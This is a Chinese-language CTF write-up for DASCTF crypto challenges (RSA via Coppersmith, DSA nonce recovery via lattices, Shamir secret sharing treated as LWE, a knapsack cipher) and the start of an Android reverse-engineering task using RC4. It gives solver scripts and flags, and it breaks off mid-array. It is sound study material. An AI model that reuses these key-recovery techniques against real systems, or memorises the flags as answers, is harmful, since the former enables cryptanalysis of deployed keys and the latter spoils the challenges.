CRYPTO

found

观察发现最后一步使用二次剩余的手段进行逐比特加密，因此尝试直接在n上求jacobi符号，可以直接得到flag

from sage.all import *
from Crypto.Util.number import *

n = 
c = 

m = [(1+ZZ(i).jacobi(n))//2 for i in c]
m = [1-_ for _ in m]
m = ''.join(map(str, m))
print(long_to_bytes(int(m, 2)))
# DASCTF{c764ba09-b2aa-12ed-ab17-9408ad39ce84}

1z_RSA

int(str(p<<120)+str(q))相当于 (p*2^120)*10^k+q，k=39或40。

二元copper求 p,q。

# Sage

from Crypto.Util.number import long_to_bytes
import itertools
import sys

def small_roots(f, bounds, m=1, d=None):
    if not d:
        d = f.degree()
 
    R = f.base_ring()
    N = R.cardinality()
    
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
 
    G = Sequence([], f.parent())
    for i in range(m+1):
        base = N^(m-i) * f^i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
 
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
 
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
 
    B = B.dense_matrix().LLL()
 
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1/factor)
 
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B*monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []

n = 18339446336492672809908730785358232636383625709800392830207979464962269419140428722248172110017576390002616004691759163126532392634394976712779777822451878822759056304050545622761060245812934467784888422790178920804822224673755691
M = 36208281423355218604990190624029584747447986456188203264389519699277658026754156377638444926063784368328407938562964768329134840563331354924365667733322
l = 56911058350450672322326236658556745353275014753768458552003425206272938093282425278193278997347671093622024933189270932102361261551908054703317369295189
c = 720286366572443009268610917990845759123049408295363966717060100862857351750759651979922104897091176824666482923148635058966589592286465060161271579501861264957611980854954664798904862706450723639237791023808177615189976108231923

for i in [39,40]:
    for j in [39,40]:
        print((i,j))
        R.<x,y> = PolynomialRing(Zmod(n^2))
        P = (x*2^120)*10^i+y
        Q = (y*2^120)*10^j+x
        f = n - P*Q
        root = small_roots(f, (10^130, 10^130), m=3, d=4)
        if len(root) > 0:
            #print(root[0])
            p,q = root[0]
            PQ = int(str(p<<120)+str(q))
            QP = int(str(q<<120)+str(p))
            assert n == PQ * QP
            PP = next_prime((PQ >> 190) * (QP & (2 ** 190 - 1)))
            QQ = next_prime((QP >> 190) * (PQ & (2 ** 190 - 1)))
            N = PP * QQ
            e = 3
            for mp in GF(PP)(c).nth_root(e, all=True):
                for mq in GF(QQ)(c).nth_root(e, all=True):
                    m = long_to_bytes(crt([ZZ(mp), ZZ(mq)], [PP, QQ]))
                    if b'DASCTF' in m:
                        print(m)
                        sys.exit()
                        
 # b'DASCTF{Ar3_Y0u_Su93_Abt139??}xb6Cxdax90xa1xfbx14x1asxc4Szx92xaeg:Zx16ESHxd11x91xeex8aFx9fx17xd6xbbxf9x06ix9exc4lxfcCx0cx00x9exdbx13x02+yNxf0x85xadxfexfd&x97Txbfdxacxf8xffxaeqx06'

By Lazzaro

from Crypto.Util.number import *
import gmpy2
from sympy import *

nbit =130
e = 3
n = 18339446336492672809908730785358232636383625709800392830207979464962269419140428722248172110017576390002616004691759163126532392634394976712779777822451878822759056304050545622761060245812934467784888422790178920804822224673755691
M = 36208281423355218604990190624029584747447986456188203264389519699277658026754156377638444926063784368328407938562964768329134840563331354924365667733322
l = 56911058350450672322326236658556745353275014753768458552003425206272938093282425278193278997347671093622024933189270932102361261551908054703317369295189
c = 720286366572443009268610917990845759123049408295363966717060100862857351750759651979922104897091176824666482923148635058966589592286465060161271579501861264957611980854954664798904862706450723639237791023808177615189976108231923

x = [1329227995784915872903807060280344576000000000000000000000000000000000000000,13292279957849158729038070602803445760000000000000000000000000000000000000000]
pq_ = n//(x[0]*x[1])
x1,x2 = (pq_*x[0])//(x[0]*x[1]), (pq_*x[1])//(x[0]*x[1])

# pq = pq_-x2
# for i in range(200):
#     PQ = pq+i
#     x = factor(PQ)
#     print(i,x)
#     if len(x) == 2 and int(x[1][0]).bit_length() <= 130:
#         print(x)
#         break

# p,q = 855604426214387476576649090490109822073,1213149261930568621267125437333569321667
# p,q = int(p),int(q)
# PQ = int(str(p << 120) + str(q))
# QP = int(str(q << 120) + str(p))
# PP = nextprime((PQ >> 190) * (QP & (2 ** 190 - 1)))
# QQ = nextprime((QP >> 190) * (PQ & (2 ** 190 - 1)))
# N = PP * QQ

# print(PP,QQ,N)
P = 3568645677145678186647847767913853195136375094554794216910078595159477139561591230815568312539748091309459843040473
Q = 214068192062555191214464440527253433970199685522983500319669073855320868671968745050948493965230424975401521253723
N = 763933528218428362740063144747893290714655295576768532896029874141179804730143020017430379534079773751531037961074867132893544981605022026151484151321515584652838724809597675412676810669583078026377048734720511960708515190930979

F.<x> = PolynomialRing(Zmod(P))
e = 3
l = 56911058350450672322326236658556745353275014753768458552003425206272938093282425278193278997347671093622024933189270932102361261551908054703317369295189
c = 720286366572443009268610917990845759123049408295363966717060100862857351750759651979922104897091176824666482923148635058966589592286465060161271579501861264957611980854954664798904862706450723639237791023808177615189976108231923
f = x^3-c
m1 = f.monic().roots()[0][0]

F.<x> = PolynomialRing(Zmod(Q))
e = 3
l = 56911058350450672322326236658556745353275014753768458552003425206272938093282425278193278997347671093622024933189270932102361261551908054703317369295189
c = 720286366572443009268610917990845759123049408295363966717060100862857351750759651979922104897091176824666482923148635058966589592286465060161271579501861264957611980854954664798904862706450723639237791023808177615189976108231923
f = x^3-c
m2 = f.monic().roots()[0][0]

M1 = crt([m1,m2],[P,Q])

....: M1 = crt([int(m1),int(m2)],[int(P),int(Q)])
sage: M1
24672457200034589393505297047440242577008257337526825234723934863290296514122729924421261467575257688017066706504146533804164563554650988765778784270714941168394352554100757883446525403314829670523449584997982975624634855686
sage: int(M1).bit_length()
743
sage: from Crypto.Util.number import *
sage: long_to_bytes(M1)
b'DASCTF{Ar3_Y0u_Su93_Abt139??}xb6Cxdax90xa1xfbx14x1asxc4Szx92xaeg:Zx16ESHxd11x91xeex8aFx9fx17xd6xbbxf9x06ix9exc4lxfcCx0cx00x9exdbx13x02+yNxf0x85xadxfexfd&x97Txbfdxacxf8xffxaeqx06'
sage:

DAS_DSA

Please input your key: 上上下下左右左右DDAAAADD YES!! Oh!!,This your DDSSAA of DDAASS

关系式：

将异或改写为：

其中最后一部分的求和表示将m、k二进制展开，我们考虑消去部分保留这一部分

因此每一个signature都为包含x、k两个待消去变元的方程，迭代进行两次消元

最后得到若干个包含上述“与”式子的方程，根据二进制展开构造格即可

由于格中许多位置为0，因此求出的结果是真实结果的部分比特，利用二进制比较可以缩小每个位置可选字符的范围，进行爆破即可得到答案

具体地，可以利用DSA签名的方程求出一个真实的

，通过判断当前key是否产生了正确的k即可找到正确的答案

msgs = 
sigs = 
p, q, g, y = 

from Crypto.Util.Padding import pad, unpad
import hashlib
from sage.all import *
from Crypto.Util.number import *


def flatter(M):
    from subprocess import check_output
    from re import findall
    # compile https://github.com/keeganryan/flatter and put it in $PATH
    z = "[[" + "]n[".join(" ".join(map(str, row)) for row in M) + "]]"
    ret = check_output(["flatter"], input=z.encode())
    return matrix(M.nrows(), M.ncols(), map(int, findall(b"-?\d+", ret)))


# ai*k0-bi*ki = ci
def fi(i):
    assert i > 0
    r0, s0 = sigs[0]
    ri, si = sigs[i]
    h0, hi = hs[0], hs[i]
    ai = ZZ(s0*ri % q)
    bi = ZZ(si*r0 % q)
    ci = ZZ((h0*ri-hi*r0) % q)
    return ai, bi, ci

# ai*k + bi*(m0 & k) + ci*(mi & k) = di
def gi(i):
    assert i > 0
    a1, b1, c1 = fi(1)
    ai, bi, ci = fi(i)
    m0, m1, mi = [bytes_to_long(msgs[j]) for j in [0, 1, i]]
    _ai = (ai - bi)
    _bi = -2*ai
    _ci = 2*bi
    _di = ci - (ai*m0 - bi*mi)
    return _ai, _bi, _ci, _di

# ai*(m0 & k) + bi*(m1 & k) + ci*(mi & k) = di
def hi(i):
    assert i > 1
    a1, b1, c1, d1 = gi(1)
    ai, bi, ci, di = gi(i)
    _ai = (ai*b1 - a1*bi)
    _bi = (ai*c1)
    _ci = -(a1*ci)
    _di = (ai*d1 - a1*di)
    return _ai, _bi, _ci, _di


def func():
    msgs = [pad(msg.encode(), 32) for msg in msgs]
    hs = [int(hashlib.sha256(msg).hexdigest(), 16) for msg in msgs]
    A = matrix(ZZ, 256, len(sigs)-2)
    B = matrix(ZZ, 1, len(sigs)-2)
    for i in range(len(sigs)-2):
        m0, m1, mi = [bytes_to_long(msgs[j]) for j in [0, 1, i+2]]
        ai, bi, ci, di = hi(i+2)
        B[0, i] = di
        for j in range(256):
            z0, z1, zi = [(m >> j) & 1 for m in [m0, m1, mi]]
            A[j, i] = (ai*z0 + bi*z1 + ci*zi)*2**j
    
    K = 2**2048
    L = block_matrix(ZZ, [
        [1, K*A, 0],
        [0, K*q, 0],
        [0, K*B, q]
    ])
    L = flatter(L)
    for row in L:
        if abs(row[-1]) == q:
            print([_.nbits() for _ in row[:256]])
            print([_.nbits() for _ in row[256:]])
            try:
                ans = [_ for _ in row[:256]]
                print(set(ans))
                ans = list(map(abs, ans))
                key = int(''.join(map(str, ans)), 2)
                print(long_to_bytes(key))
                key = int(''.join(map(str, ans[::-1])), 2)
                print(long_to_bytes(key))
            except Exception as e:
                print(e)


func()
key = b'x01x01x04x04x01x01x13x01x01x01x13x13x13x01x13x13x04x13x13x01SSDDDSDAAAx03x03'
tmp = list()
cnt = 0
for i in range(len(key)):
    ki = key[i]
    now = list()
    for j in b'DAS':
        if j | ki == j:
            now.append(j)
    tmp.append(now)
    if len(now) > 1:
        print(len(now), now)
        cnt += 1
print(cnt)

r0, s0 = sigs[0]
h0 = hs[0]
m0 = bytes_to_long(msgs[0])
gk = ZZ(pow(pow(g, h0, p)*pow(y, r0, p), inverse_mod(s0, q), p))
print(gk % q == r0)
for t in range(2**12):
    now_key = list()
    ind = 0
    for i in range(len(tmp)):
        if len(tmp[i]) == 1:
            now_key.append(tmp[i][0])
        else:
            now_key.append(tmp[i][(t >> ind) & 1])
            ind += 1
    now_key = bytes(now_key)
    k0 = m0^bytes_to_long(now_key)
    if pow(g, k0, p) == gk:
        print(now_key)
        print(b'DASCTF{' + now_key + b'}')
# DASCTF{AADDAASAAASSSASSDSSASSDDDSDAAASS}

complex_enc

当满足m[i]=1时，就将m[i]*k[i]填入列表cipher_list中，最后在对列表中的元素求和。所以能从最终的c反推出m[i]，如果满足c>=k[i]，说明当前的m[i]=1，依次遍历得到m的每一位，然后恢复原始字节。

from Crypto.Util.number import *
c=287687761937146187597379915545639385740275457170939564210821293233370716878150576
key=[1, 2, 87, 99, 190, 380, 760, 1702, 3350,......]
def decrypt(c, key):
    m = [0] * len(key)
    last= c
    for i in reversed(range(len(key))):
        if last>= key[i]:
            m[i] = 1
            last -= int(key[i])
    return m
m=decrypt(c,key)
m= [m[i:i + 8] for i in range(0, len(m), 8)]
decoded_string = ''.join(chr(int(''.join(map(str, byte)), 2)) for byte in m)
print(decoded_string)

EZshamir

多项式系数较小、低位加噪的SSS，按照多项式形式构造求解lwe即可

from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import AES
from hashlib import sha256, md5

pbits = 400
noise_bit = 32
n = 100
m = 75

p = 1914861180127910915217161496032452354459288330404267938814385633318816795789745430689392291853522228462459760259540145551
shares = [(871685718803663381427930478762339134295053004512609923589551466783266783810259304828550374243064535763376291757646963959, 202160546047966750331912360731430418240633973593625005229082586127891061162361922677243409978233971196981357156050665207), (880630661134451484589856936400581718913135314681369937077374828269467594291354487238721693384105758714624990294669591318, 1095968002726348118037606681187141462053336336722142181092378890939072246257043346524710197351420437134900753767241347071), (2201481802919131040050333908088433208558917203945919199978631826943299343536825970006258238556122903076523292840756434743, 692254736946777374134144410762495005358360246411034340533738679554417430991182506230475828234351704793913692448647675007), (1378304382181829689586748896745391077371970833336011385982116414924775680216930605930619270704824436444608781376558454118, 1349836972600983636760377380443471914884359770040030987799061599827409370783772298884084190105572886840534075250106753145), (1353153805805015283526548792279508930383121644895000056925297797888893262990508466655386951026647093911241738634749231794, 708640659789589986759360580045421230914410242138084549192350870784628479597574645622638880069506009868145944996982225278), (1060943952101159814075555130286870049673510249558382992676797709837360932812847335287824269141102612270742087176360534041, 1039246257482395034113137526078027968667726416005827851568387262127498749146041230779139405404483176650987996444622585854), (2424118466972165402210232064008571072995878364648534891594437945505312271409808703384482184386252162745547514610618028336, 635156696412302837761915637951567688860519995373738062624916498633145442364997312202584276482319362616731324143180341246), (1772241931859851196567261257895529032033057998867860001437142889635454121520207911859978309001300625929738493595845855555, 500604911497932506773931452024208499570885483407547558939058205116845746585850868300414311672651970998734159786902749117), (187044491746709666918227023301039735707457548611767420757592410489694090421689472337383722846260140189038198219461031942, 227360883946968296249705407270310276359769497016888615738491818601296225309783611129587894811655567646792586796017233916), (698522560244433302990615272949028179635002687309158390959480083880213377867539289895143372657572453749378003459093150970, 1438446488346299625609140434323525340139617346663444436909013102079035123226801253230191914228775608263694160574643826415), (1314293541818269470008262253418684239221368418527916534392752287558240541875482130114787897305513520252998018265836595136, 933106402921508526957532367623168847119197804766985507707958985877339350054085035066950570021869141193740290685053960123), (1501745172784237049923522578654390251325669575513607134910901665808936517556360097769749957840258117848678845196676974438, 1516777488301366348170721193695469080262430948767494893352311177358850775942249045078694319757619073073088994542922628861), (1718313250889012550002734353486104431289067168806022987862850465345813017177898627414672453244745977044381286178413506161, 506057417158279773145112367533063233326190899630436097648290976200406049591277922238049560242268646574334872382933403615), (2574114678492270903282456732270950593394194358462333441160509514501148947640703147403802718744307473847235179125898798831, 1503310774908591444184865449721473627976722270933784408676574059139777045024294387334806494605277115228299871854598791166), (1770243408559044970812149306040976785192946281881654467315187543403793080522851914844996680381886937167658398949087446193, 1099237075950355774454839935750271630613513947414691912497783029355832037700530351594087156234712938075324990262460261245), (2166086041023587382902739106621961372440200378327129977520031042444044378994128764308981213008281610274832831816068579582, 662709908868241192557028160616176772511764390044399310771390622778705044736473497185759270701465132475627229112002146287), (2170463762878343673691652149382892550249493539913487563393294153717628928418073705621516968910372026548584895576642432967, 1413676394542378061807394780263485269329077458637078447074464881203630348193024572124672013567573482444837133106653543455), (1129266289804637843248865446624604876222278055268049666382746600434990532837254822384883357227875808573227656504651891817, 1535832745242864345604750984721590856572422259228943440577864210008688452305222147646810543026576688303372824677842288383), (2306555154959167883502684934268021903550464872811594873384525370627065323932167910172723635326929186844444801386870524867, 574207014379682600904001842474004352741607105704886122985304177072984415266547565043126591318153332317051149516485422972), (1724617341290962542300349861015192124473593787607849187241871123866653776294891983393875816012660538610025134685453770248, 1037506311823536647118763707562050051146414393535410677631530307480219373475166677371198285257502421566885284344997084663), (202616766252415923229841624622749382197002736241072130496684863225861466295470440453433729087043063339640795866357221636, 1486069111757435527648291199412538135459418727823506381342991481853059317128849411787275828115963269643450637901851750359), (782072578333357184532047183424922628763983310554137973249125608272717772586145583974361061586170067251618252434433193104, 283757911494107775111019950316083145592345149507512192994272372101655062364071745340414019692327679359235776555825852415), (2197595167942118116042253773798345585826387963460510458606977372991191820486797272252095468231729659915814456157670560486, 955293934596965502510872570415413020132164928134045802395033751487848017887015144832326371969637236306696054523237785589), (1098157283702819563820742199423754909028104781243946454418867995181539307551856844793857199640783377355282394025101300655, 635111390180648841537968959615311456853925067622053148053038395898914597955860998732345527697104011201693008366561317143), (1539369283131984995745859995105101736066475537281347948822432206665809508754710210661232887491808392388057664234877214907, 1873336536033306125287332317304933459481487853852475402907316652085126765046749618993624553154025815108827029610442783458), (2105684701096534411811602939870350859970761398331640507345513836997797916059406457337165075287082983610738904681969289045, 1070056100602518593988818068846549889380286647944194826819905043161724050669042969316031968306712388470995120352413349630), (142489011778634823488933340993644406251365634143001554672065147110660487229716505211502368066478460823953952289740995290, 1600505031347134429197259601839106217157515935077383802359036680943190353630112460191899585397343290624969344500745894703), (554711031900068277207319195022074787064807351540056727585559478009641245829914129658355024028140622126230477378977389537, 65339521639683012798947456976243744037602872322070608133060186211835711806848370610017017866030009537787109068192454654), (532900849979395683891747931991929993723658239680866376615001124559008204600725833769158798743570050012188528983307982345, 334144016771241488303216672075523455061388505657739817526966708251875900758813513342313135616513439456734341083743369135), (869702918099306179247127839502723535611690279734139047798433105147760657329410795136726045654330604238870805984709621246, 1169351283105013313749641940783038490083938869389146122787264490618765187367135121126934960933658038044552677868393266925), (786239400981081690761967926939692614214352370457999126682279606306346828244856149092806342991454830115357428173569519111, 341229317116770102168944480795910149567176593419165900124153031167345358788428115442807890687039322892597408592425778007), (2064213065995911617919315029041029121543167107287437882288959061187785048503282055451690399898250479932109432366548223997, 865205430622864313641681018820800198136329954993789609121686669624009340125228193996720833574248608603224773986947432415), (1996571933560681341081972550429260163713030332385776633835663546385508374790580854691775408939051083454291050879529580125, 559622002964744852554436566542525646157533309978763685146044798881793139644019170010343656282702809565334484141114392471), (1665201866056279622733275067329071022333699015026928761307123522986743452132023670960400981020146860918570153444345681972, 1206659985279999461070238583934930315667638779868565409888110141662803190569415230894181412146290317311945493517622418483), (1515824630378748853880547205191400487565887686063520538971380532161078510669610334484477786016989319170924543667026641318, 154768510600010010017326698396207970330238438685198973674456030784650112353692986269413531937661879315225602124927708924), (2400640362993011976891348699605911902016988451462173893625476704482508356176787307014920885489349704332546642981698540069, 1121421906118323024216284095711804126345276955926784522370067713782427318851230923383318334457757167182928811853910539965), (914679394823164487648957492231711749917619119979512000391828434330805091270968219541264417579001916453063785209093025303, 374627069056072738750323688310128739794138886219071824099120374559973078400286337012659440934169856150484268780102828020), (1021972013999414078223981430633642397558044349935082594710388870307835007718638824792649139809042384573145837264785258692, 102093917357525962153933641992946656421204665316272197308632790969421027148825374536157392412871816080580115446708002591), (1090613002154339666672492884775405717313689831457406446112184992081112549743653583926163772335048052650217605191460964064, 1013686859153230698540678410867250429548404782986370285534810877495709441098450523218264937019132584108142305563714746606), (2161046501022327990933396497482765893753709560942237251106031463450880235879988355009303131242535391464106086265266338474, 1842825126623549349236000977359585068860414649531034170142594564984327572182360450517454690000097975914639809219290654045), (734600260267770729123110997283110745757092649194443870464263775523592639286156519663230810008655565992062564338915033184, 1439472390868656814802271856900227714476824912359664972147156053839098765837149646453806800388007932953080250670815772651), (881335900275714936417588963897633003585264162416587081468620588101288614371107988322661634495058217226298025521720126634, 1438060177355585280770231938473797663421441580729795412881287946986577092068342750409767988724102261013424113586148457982), (876173729780067336779925806297809473013555554668200124165269741312909223647316933287442159368855433236050789576297672813, 584722637090302053439384198012199760324880317678105782762720083676914628942486088928409942979389876557255132127516159991), (1733558429089397683359597663185076627234549140640918522337597781379981378009350733554208954192805660163725305958818509205, 1010477387678444338602582972843701290504497269295430761287923107029938822433731115008623372768060580369747062615441406973), (1758000758086776729345325124199287880198692107697670885448853730203070351345566212118269510767350031899984650531292511829, 1484408939224604508966101404659297622265311898991708197399154932571955375325130297122648740841893311564144118335134464767), (1804131890436486866363129670875272535127829613109307224638927349502815652920038318044827248066297349084047126682198723537, 205851561043462971495790984180238782403371191306463313748537952075031757233102533087892093246459879467418213080624418525), (115055233675952369353652759916228030654313474433562820828539341357745365094094469880187786426435712648771454584499932530, 1176080864489594177205517592453183512444290818765306305520846987245653463202230068116379056777589684194022156652500590286), (2328185963017050382404641363914321749130815400658884925780323745763587492366183441185791654864416499947607965414839983680, 1886972372164945427290729032551681924723044624295253696412030824048931146570915452349880650169939511030432165431905079162), (1187461847839408713851221476312312384869325749843380494840008651043567024911068726332857155522639869883501560564590472502, 14245981570273560431111454126826341091354415427387740559245555665941487543601004914128539171516718107049427670791071455), (1275402030469087379247637832029139314437943507754693234009807154397029994354617242802931983091961356790463942774885431413, 1244618585414033483912499539268357193993901084573974055024618656871349876744646123907837743332137138284077968028988239205), (434412507816189969843251866894800201497317336949194643079967243932448367734854234524383921690504689272627248814185361829, 1193224411748734492892063266412070819051994764468021617840046995194588804893634149301845035319723286201666783735434959871), (967206800413690215868425566102618623559678834432686964828977512828919721907280699739833113197470139412151190023683313494, 1808530961381834386234136376719035780314110457320233165055990056489953593025409242256807470925700807422319096558572795309), (313624779412398332754376720890766035026328871037358868168298423270666735999144035960122672900278781994670311217953770375, 1686899500506262775384473022726677756466624697749756704659992441285341042856582261569357914257097304916151170085370461887), (2503049409019801269651799221722260539204050296212337202096008034125758666888245353212657377647881087341258220743220151950, 1805670425703721038437117454438319230600703158318099419770216013430708468787297957979021344350598998116788430512286857710), (542793615526234040152647477936504636873290026979804505200706031754909176961382452267207291751054204331474258583862955704, 137413216840404664240606423528330611923289618863367088636432169005845572010429296034368451334357274658088690084213739519), (1278727765228747216000039330509641392475448645848420065175572576050796418025108532539983143839105111868933395201633094022, 23388499359309984016274969787898858204391606769507546898645785064534114465222342746534462082168690576567031618802237437), (1012848580192164395816758294581574397534987673377799482227399907475636722043236850766024023620412517564680586256857352143, 1905214326869438439368196073362306288481014496204443072620153943726399155969870686475260450389360494546627630953811148739), (14681804970662677021409260234892378252555735233958673970664432299644093318314837872915339633110893420712659256185701001, 1011761630527797621590321605066946971053085037922024159289431337005985850853467103097812975363878048453898707806902513147), (1285297724752785338545033366325253262303128927017049271006754406539647664563391436762226286574374768602309413720192759993, 1493631305230939817393915729396076315723258260416123252804505906893714637325280535095299471289740565654113670071232495263), (1936455326607738910358536004445045468685935298243245355139607465446389473389575731412354107347767379820812067955096505581, 17221509529814003689149745147239645298120184452011530064684368807629510922529681925724732647573630702864807669020485630), (1712173121206746224826777847167590088908487771935061508185448418705799456315866273530139739504675597716276421618856320329, 863258960233895711001625204805338525869459949675833484269384656157104193362371966225031203968537041681324265578127949567), (122947819386929089053369455928546401519366926955589935482151285368760894784571110782585692673158533373827447719944343791, 1029102739229804972707735760530574223266205866939373652705629746591419564062928935797957680207632040596245681227704817914), (2385767142510533504647214446664898369383090132453476416454822794037991187237960157132343084153289103535309857420295111775, 1761624877069474386824225334992881109136596455709107320013742630575693526591737171363464568721656277644139593399384668014), (812771942753829583712722765469520203663717266127958627830326203252222513862479475416772893289895236549766564327139922612, 1400551965978757484763340299740157171921224208542574495162921941233365483529203665206398541892811136907423472715818784767), (1730447421466464570286474725493766890793606044225883792125770759375672642470742177732074062181325776806752255986611978352, 1227172422842784980554449107675660327741994737748190415035709694965213848256121533465275911556767542681543052337917439991), (884876570094879628298320898305798783174822422253214800767481822053599408285668812621687108791956015225332329856833897849, 753204920370187659065626153785437381083012604855618525406022085513242388007754850086113679887120336586260993544726445815), (2423878693124084232298267862648738136330397292982760413012437397441533882471872339001090243864079240084356627531832647422, 77986001656302970387684242942282141405916785932070787943262406584312194694807333266164831908062494860407574874622803959), (1290185371498453630061135665764650237444736789468400436115999443209964260044045414036036267228562648112405016415084034369, 68976337771940690010768399948574523361633543589446521911372413501313976435844421496476544211566756895340409483041171429), (534185007935476498632058534030834014275044346188926848916387521022740118957225895686427252642167800163347935460364558055, 731879744398464762194277983635893240035937844142280555568092822946046633080006561051406094554262898470573348173297417945), (2009543648096147223331131572743756103868310430657031922289948135024763757031731292638042205835167380178315151642456024876, 864568612425196666545678285566636785636433247142630432401391420609479878443671268150141447157212173236963221732165810175), (1757088643325711453646774590651240485497713141719261877086100356614624931730830270746024611221269656481354818801893802862, 974732470392774737526017597270025996122553373618728789664042196211840392818797860303355085148223560919202565975591828989), (288236986926014229269042124754978817491981631142567735873084199780621570926784314358694003281689620128867232148908447783, 1677180488607905300411659606081989540342864981198203708964066014660249657102993313228752304204059137461689367948628457454), (2357100534536251965755486926312170142467175578829851375102247846264889085384519286073305902768874043332485938824401972401, 701015346799246873651989606339191939588270778423404768025441929439466616345395882534334734331126078737835606277756551038), (361601359553041584651624082197420503156194921051661310152767809536879950298413026398079782027847432778044471125267794148, 338870184820594722235914590766168929044789583242319904735556030852263040707796808350885054449714833051229949699390437343), (437493113470125074131702090577490292225129373521518638964839429915294209870286662477332241046314129156199317300178856910, 304951333972637627160342487320016313244618388459742922018615396895218523409067458512473044675590109759792913998170528746)]
ct = 14058554635665083618818231958810639805770645952778992611953881143316377164307777281092527452513347998950720853358361

def flatter(M):
    from subprocess import check_output
    from re import findall
    # compile https://github.com/keeganryan/flatter and put it in $PATH
    z = "[[" + "]n[".join(" ".join(map(str, row)) for row in M) + "]]"
    ret = check_output(["flatter"], input=z.encode())
    return matrix(M.nrows(), M.ncols(), map(int, findall(b"-?\d+", ret)))

K = 2**(256 - 32)
L = block_matrix(ZZ, [
    [1, K*matrix(ZZ, [[pow(t, i, p) for i in range(n)] for t, y in shares]).T, 0],
    [0, K*p, 0],
    [0, K*matrix(ZZ, [y for t, y in shares]), p]
])
L = flatter(L)
for row in L:
    if abs(row[-1]) == p:
        print([_.nbits() for _ in row])
        coefficient = list(map(abs, row[:n]))
        key = "".join([str(i) for i in list(coefficient)[1:]])
        key = md5(key.encode()).digest()
        print(key)
        aes = AES.new(key = key, mode = AES.MODE_ECB)
        pt = aes.decrypt(long_to_bytes(ct))
        print(pt)
# DASCTF{3617af36-7869-6939-3a09-bb8038aea171}

REVERSE

BabyAndroid

附件给了http数据包，首先想到给app抓包分析

发现固定的host为 yuanshen.com,猜测与request请求有关

读取sex.jpg的数据进行rc4

def rc4_decrypt(key, ciphertext):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    i = 0
    j = 0
    plaintext = bytearray()

    for byte in ciphertext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        plaintext.append(byte ^ K)

    return plaintext

key = [0x44,0x41,0x53,0x43,0x54,0x46] #DASCTF
ciphertext = [0xb5,0xfc,0xd6,0xc1,0xb0,0x94,0xbf,0x2f,0x05,0x31,0xec,0x0e,0x81,0x34,0xe0,0x9a,0xb3,0xdb,0xd1,0x86,0x3e,0x01,0x4f,0xa9,0x9c,0x15,0x7c,0x4f,0xad,0xef,0x6c,0xcf,0xcb,0xe2,0x0e,0xaa,0xb7,0x99,0xac,0x92,0xd9,0x46,0x5c,0xb1,0x9e,0x68,0xbd,0x7f,0x89,0x28,0xe3,0xcc,0xda,0x97,0xce,0x37,0x17,0xed,0x24,0x5f,0x35,0xf2,0xc0,0x96,0xf7,0x20,0xd3,0x3e,0x36,0xb0,0x18,0xda,0x7b,0x49,0x7a,0x90,0xb6,0xcc,0xe6,0x63,0x57,0x6f,0x46,0x6d,0x34,0x1e,0x44,0x08,0x60,0x19,0x03,0x9a,0x30,0x8e,0x9e,0x28,0x1e,0x7e,0xb3,0x22,0xbc,0x0b,0x13,0xac,0x1a,0x23,0xb5,0x6f,0xe7,0xf4,0x71,0x08,0xef,0xcd,0xcd,0x17,0x82,0x99,0x53,0x4d,0x35,0xa8,0xe8,0x62,0xc8,0x7b,0x59,0x96,0xf2,0x10,0x53,0x84,0xf3,0xa6,0x1a,0x3d,0x1f,0x54,0x64,0xbd,0x5a,0x15,0xc5,0x76,0x1c,0xc1,0xfe,0x56,0x1f,0xde,0x56,0x49,0x1d,0xec,0x92,0xf1,0x3f,0x19,0xb5,0x1e,0xe6,0x9c,0x14,0x2b,0xa6,0xd7,0x7c,0x45,0xf1,0xd3,0x3c,0x17,0x69,0x9b,0x57,0xf4,0x1f,0x2e,0xa5,0x3d,0x7c,0x10,0xec,0xf5,0x03,0x9c,0x2f,0x29,0x3a,0x38,0x4c,0x6f,0x32,0xe8,0xce,0x3f,0x2e,0xf0,0x21,0xaf,0x8b,0x99,0xa3,0x62,0x43,0x43,0x15,0xde,0xf9,0xd8,0xea,0x30,0x21,0x22,0x21,0x0a,0x3f,0x94,0x1e,0x3e,0x69,0x55,0x0a,0x8d,0x31,0x88,0x0a,0xcf,0xd3,0x5b,0x4a,0x16,0x23,0x5c,0x35,0xfe,0xef,0x17,0xc7,0xff,0xaf,0x40,0x2e,0x1c,0xb1,0x77,0x9e,0x4c,0x42,0x28,0xc9,0x33,0x79,0x9b,0xb9,0xf8,0xe9,0xf2,0xec,0x3f,0x41,0x49,0x5e,0x9d,0x72,0x83,0xcc,0xcd,0xd8,0xb6,0xdf,0x53,0xfd,0x74,0x74,0x64,0xe9,0x49,0x26,0x22,0x92,0x95,0xb4,0x30,0x1f,0xac,0x2c,0xab,0x13,0xfa,0x99,0xa4,0x22,0x27,0xf0,0x41,0xd2,0xa1,0x03,0xbe,0xdb,0x7a,0x25,0xfe,0x99,0x73,0x6f,0x65,0x8c,0x35,0x40,0x4f,0xbb,0x79,0x4a,0x2d,0xce,0xd0,0xa0,0x80,0xf7,0x3f,0xa9,0xdc,0xd2,0xfb,0x70,0xb4,0xb0,0x87,0x3f,0x6e,0xe0,0x84,0x75,0xe9,0xc7,0x10,0x88,0xa2,0xa4,0x58,0x7f,0x8b,0xa0,0x84,0xbb,0x4d,0x0b,0x96,0x37,0x9d,0xcd,0xad,0x2e,0x1c,0x03,0x88,0x3e,0x87,0x8c,0x1c,0x4b,0x59,0x77,0x9c,0x46,0x51,0x95,0x4b,0x77,0xef,0x70,0x29,0x5c,0xad,0x1e,0x11,0x21,0x44,0xd7,0x39,0x63,0xf8,0x3a,0x61,0x6e,0xdd,0x01,0x2a,0x96,0x26,0xec,0xbf,0x79,0x63,0x30,0x83,0x13,0x76,0x48,0x4c,0xe3,0x20,0x43,0x09,0xce,0x4c,0x1c,0xe3,0x4d,0x6a,0x